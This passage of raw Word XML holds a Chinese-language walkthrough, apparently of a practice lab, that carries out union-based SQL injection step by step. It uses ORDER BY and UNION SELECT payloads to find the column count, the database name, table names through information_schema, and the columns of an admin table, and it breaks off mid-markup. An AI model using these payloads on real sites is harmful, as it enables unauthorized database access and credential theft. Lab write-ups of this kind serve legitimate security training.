                  <wp:effectExtent l="0" t="0" r="3810" b="1143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7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3780790" cy="2249170"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="475D7B1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3818890" cy="2271395"/>
                  <wp:effectExtent l="0" t="0" r="16510" b="1460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8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3818890" cy="2271395"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="025D45AE">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>这表明该网站后端未对引号闭合进行有效处理，存在 SQL 注入的可能。接下来，尝试使用 ORDER BY 语句判断原始 SQL 查询中返回的字段数量。测试链接如下：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6597AD10">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 order by 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5624CC">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http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F8F8F8"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:fill="F8F8F8"/>
              </w:rPr>
              <w:t>=1 order by 1,2,3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518ACD9D">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rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 order by 1,2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA10A64">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3683000" cy="2193925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="158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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3683000" cy="2193925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="25675593">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3714750" cy="2212975"/>
                  <wp:effectExtent l="0" t="0" r="19050" b="222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0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3714750" cy="2212975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F81DDE7">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3714115" cy="2215515"/>
                  <wp:effectExtent l="0" t="0" r="19685" b="1968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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3714115" cy="2215515"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3903ED60">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>当字段数超过 2 时，页面报错。由此可推断，该 SQL 查询语句最多支持两个字段。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38727DAC">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11D9B7C6">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28AAFD2B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="767EC35A">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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6CE7E079">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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获取数据库名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D87D2D2">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>利用 UNION 联合查询，并通过恒假条件 0=1 排除原查询结果，构造注入语句如下：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1BCA50">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 and 0=1 union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="A626A4"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> 1,database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2696E15E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D30098A">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3822700" cy="2181225"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="317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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3822700" cy="2181225"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D8B5A40">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>执行结果显示，当前数据库的名称为 maoshe。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13EE8751">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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="262C9E19">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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获取数据库中的所有表的名称：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186E5272">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>继续使用联合查询，从 information_schema.tables 中提取 maoshe 数据库内的表名：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD9C860">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 and 0=1 union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="A626A4"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> 1,table_name from information_schema.tables </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> table_schema=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="50A14F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'maoshe'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E79BDE">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09DCB38E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3752215" cy="2242820"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="1778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3"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3752215" cy="2242820"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1985DB">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>初始返回结果显示数据库中存在名为 admin 的表。由于通常数据库中包含多个表，可使用 LIMIT 子句进行分页查询，例如：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4668FAB7">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 and 0=1 union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="A626A4"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> 1,table_name from information_schema.tables </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> table_schema=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="50A14F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'maoshe'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C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>limit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="065DC30F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3992880" cy="2386965"/>
                  <wp:effectExtent l="0" t="0" r="20320" b="63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14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3992880" cy="2386965"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC52F31">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>通过依次修改 LIMIT 的偏移量，确认数据库共包含 4 张表，分别为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FEF2598">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>admin, dirs, xss, news</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F27552">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kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74F3AF1E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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获取每个表中的字段数量以及字段名：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1D2E05">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>同理，可使用以下语句获取 admin 表中所有字段名</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEA85AF">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1 and 0=1 union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="A626A4"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> 1,column_name from information_schema.columns </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> table_name=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="50A14F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'admin'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E1C671">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3958590" cy="2358390"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="381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15"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3958590" cy="2358390"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
